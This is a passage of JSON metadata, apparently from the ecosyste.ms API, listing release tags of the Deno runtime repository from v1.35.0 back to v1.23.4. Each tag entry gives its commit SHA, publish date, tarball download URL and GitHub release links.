0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_